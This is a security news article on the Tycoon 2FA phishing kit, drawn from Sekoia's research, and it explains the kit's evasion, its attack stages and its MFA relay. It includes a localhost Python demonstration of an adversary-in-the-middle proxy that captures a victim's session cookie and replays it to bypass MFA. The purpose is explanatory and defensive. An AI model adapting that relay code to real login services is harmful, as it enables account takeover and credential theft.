Tycoon 2FA, a widely used phishing-as-a-service (PhaaS) platform behind thousands of attacks on Microsoft 365 and Gmail accounts, has become even harder to detect.
The phishing toolkit has been active since at least August 2023, according to research from security vendor Sekoia, which discovered the PhaaS in October 2023.
Tycoon 2FA is an adversary-in-the-middle (AitM) phishing kit that primarily targets Microsoft 365 accounts: it relays the victim's sign-in to the real service and captures the session cookies that result, which lets the attacker bypass MFA.
On March 25, 2024, Sekoia published research indicating that the group had released a new version of its phishing kit that features better detection evasion capabilities.
The main changes are to the kit's JavaScript and HTML code, and to its ability to recognise and turn away traffic that looks like a scanning environment, such as requests from data-center IP ranges or from the Tor network.
The kit has also been updated to reject requests carrying specific User-Agent strings, including those of some Linux browser versions.
The report claims that tracking Tycoon 2FA activities has become much more difficult after the group improved its stealth capabilities.
“Recent updates could reduce the rate of detection by security products of phishing pages and Tycoon 2FA infrastructure. Additionally, its ease of use and relatively low price make it quite popular among threat actors.”
A typical Tycoon 2FA attack
Sekoia broke down a typical phishing attack using Tycoon 2FA into the following stages.
Stage 0 is the distribution of phishing links, via URL redirects and QR codes embedded in the body of an email or in its attachments. The service provides its customers with phishing attachment templates as well as pre-designed decoy documents.
Stage 1 is a Cloudflare Turnstile challenge that filters out unwanted traffic, such as bots and security scanners, before it reaches the phishing page. Stage 2 runs JavaScript that redirects the user to another page and extracts the victim's email address.
In stage 3 the victim is redirected once more, and in stage 4 they are shown a fake Microsoft authentication page that exfiltrates the credentials they type over WebSockets.
In stage 5 the fake login page triggers the 2FA challenge: it relays the victim's input to Microsoft's legitimate authentication API and relays Microsoft's response back, so the victim sees exactly what a genuine sign-in would show.
Because the attacker's server sits in the middle of that exchange, it also sees the session cookies Microsoft issues once MFA succeeds. Replaying those cookies later gives the attacker an authenticated session without having to pass MFA again, for as long as the session remains valid.
“This 2FA relay capability is the core feature of an AiTM phishing kit, which aims to intercept login data during a legitimate session-based authentication between the victim and the legitimate service.”
The final stage redirects the victim to a URL chosen by the threat actor; Sekoia found this was often a legitimate or legitimate-looking page, so that the victim does not suspect the previous page was malicious.
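The relay in stages 4 and 5, as an added example that is not part of Sekoia's report and contains none of the kit's code: a mock identity provider that requires a password plus an OTP and then issues a session cookie, and a minimal adversary-in-the-middle proxy that forwards the victim's input to it and keeps every Set-Cookie header it sees. Both run on localhost; the account, the `/login` and `/mailbox` endpoints and the `SESSION` cookie name are constructed assumptions for illustration, not Microsoft's real API.

```python
import http.cookies
import json
import secrets
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# Constructed demo account and cookie name (assumptions for illustration).
# MockIdP stands in for the legitimate service; nothing here contacts Microsoft.
ACCOUNTS = {"alice@example.test": {"password": "Winter2024!", "otp": "123456"}}
COOKIE = "SESSION"
_opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))  # ignore proxy env vars

class _Handler(BaseHTTPRequestHandler):
    def log_message(self, *args):
        pass  # keep the demo quiet

    def reply(self, code, obj, cookies=()):
        data = obj if isinstance(obj, bytes) else json.dumps(obj).encode()
        self.send_response(code)
        self.send_header("Content-Length", str(len(data)))
        for cookie in cookies:
            self.send_header("Set-Cookie", cookie)
        self.end_headers()
        self.wfile.write(data)

class MockIdP(_Handler):
    """Legitimate service: password + OTP mints a session cookie; the cookie alone reads data."""
    sessions = {}

    def do_POST(self):
        form = json.loads(self.rfile.read(int(self.headers.get("Content-Length", 0))) or b"{}")
        acct = ACCOUNTS.get(form.get("user"))
        if self.path != "/login" or acct is None or acct["password"] != form.get("password"):
            return self.reply(401, {"error": "bad credentials"})
        if acct["otp"] != form.get("otp"):  # the MFA step the attacker cannot pass alone
            return self.reply(401, {"error": "bad MFA code"})
        token = secrets.token_hex(16)
        MockIdP.sessions[token] = form["user"]
        self.reply(200, {"ok": True}, [f"{COOKIE}={token}; HttpOnly; Secure"])

    def do_GET(self):
        jar = http.cookies.SimpleCookie(self.headers.get("Cookie", ""))
        user = MockIdP.sessions.get(jar[COOKIE].value) if COOKIE in jar else None
        if self.path == "/mailbox" and user:
            return self.reply(200, {"user": user, "mail": ["Q1 invoices"]})
        self.reply(401, {"error": "sign in required"})

class AitMProxy(_Handler):
    """Phishing back end: relays the victim's input to the IdP and back, keeping every Set-Cookie."""
    upstream = ""
    harvested = []

    def do_POST(self):
        body = self.rfile.read(int(self.headers.get("Content-Length", 0)))
        try:
            resp = _opener.open(urllib.request.Request(self.upstream + self.path, data=body, method="POST"))
        except urllib.error.HTTPError as err:
            resp = err  # a 401 for a wrong OTP is relayed too, so the victim sees the real error
        cookies = resp.headers.get_all("Set-Cookie") or []
        AitMProxy.harvested.extend(cookies)  # stage 5: the session cookie is captured here
        self.reply(resp.getcode(), resp.read(), cookies)  # victim ends up logged in; nothing looks off

def _request(url, body=None, cookie=None):
    # POST when a JSON body is given, GET otherwise; returns (status, decoded JSON)
    req = urllib.request.Request(url, data=None if body is None else json.dumps(body).encode(),
                                 headers={"Cookie": cookie} if cookie else {})
    try:
        with _opener.open(req) as resp:
            return resp.getcode(), json.loads(resp.read())
    except urllib.error.HTTPError as err:
        return err.code, json.loads(err.read())

def _serve(handler):
    srv = ThreadingHTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, f"http://127.0.0.1:{srv.server_address[1]}"

def run_demo():
    # Victim signs in through the proxy (stages 4-5); the attacker then replays the cookie.
    idp, idp_url = _serve(MockIdP)
    AitMProxy.upstream, AitMProxy.harvested = idp_url, []
    proxy, proxy_url = _serve(AitMProxy)
    try:
        creds = {"user": "alice@example.test", "password": "Winter2024!"}
        wrong, _ = _request(proxy_url + "/login", {**creds, "otp": "000000"})
        n_after_wrong = len(AitMProxy.harvested)  # wrong OTP: the IdP minted no cookie to steal
        ok, _ = _request(proxy_url + "/login", {**creds, "otp": "123456"})
        stolen = AitMProxy.harvested[0].split(";")[0]  # "SESSION=<token>"; attributes dropped
        replay, mailbox = _request(idp_url + "/mailbox", cookie=stolen)  # direct to the IdP: no password, no OTP
        anon, _ = _request(idp_url + "/mailbox")
        return dict(wrong_otp=wrong, cookies_after_wrong_otp=n_after_wrong, victim_login=ok,
                    replay=replay, replay_user=mailbox.get("user"), no_cookie=anon)
    finally:
        for srv in (proxy, idp):
            srv.shutdown()
            srv.server_close()
```

Calling `run_demo()` returns the status codes of each step: the wrong OTP is rejected by the IdP and nothing is harvested, the correct OTP logs the victim in and leaves the cookie with the proxy, and the replay against the IdP succeeds with no password and no OTP while a cookie-less request is refused. The proxy never has to break MFA; it only has to be in the path when MFA succeeds. What breaks this relay is not a stronger OTP but an origin-bound factor such as FIDO2/WebAuthn, whose assertion is tied to the genuine site's domain and cannot be forwarded from a lookalike, together with service-side controls such as device or conditional-access checks and short session lifetimes.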
Max Gannon, cyber intelligence analysis manager at email security specialist Cofense, said MFA bypass kits like the one described above have leveled the playing field for attackers in the phishing arms race.
“These multi-factor authentication (MFA) bypass kits are undoubtedly effective, which has likely led some people to claim that this is a failure on the part of MFA. However, MFA prevents someone with stolen credentials from accessing resources without authorization,” he explained.
“When victims fall victim to these MFA bypass phishing attacks, they are effectively logging in and authorizing access that MFA simply cannot protect against.
“These kits essentially reset the phishing arms race to where we were before the advent of MFA, where the key factor in preventing account compromise is the person who is being phished.”
Business is booming for Tycoon 2FA, with over 1,200 domains linked to the platform
Tycoon 2FA first came to light when a Sekoia threat analyst found the first evidence of the kit during routine threat hunting in October 2023.
Sekoia analysts examined several phishing pages and found that they shared the same obfuscation techniques.
Using those similarities they identified hundreds more phishing pages generated with the same infrastructure, and eventually a number of domains believed to belong to the threat actor behind the platform.
Notably, these domains shared the same login panel labeled “powered by TycoonGroup,” as well as a domain that hosted a website promoting Tycoon 2FA as “the best phishing platform to bypass 2FA.”
Sekoia has been actively monitoring the phishing infrastructure behind the Tycoon 2FA PhaaS operation since discovering the group, and has identified more than 1,200 domain names associated with the platform since August 2023.
Using data from cryptocurrency transactions it attributes to the SaaD Tycoon Group, Sekoia says the group's operations are highly lucrative and predicts that the platform will remain a prominent player in the AitM phishing market in 2024.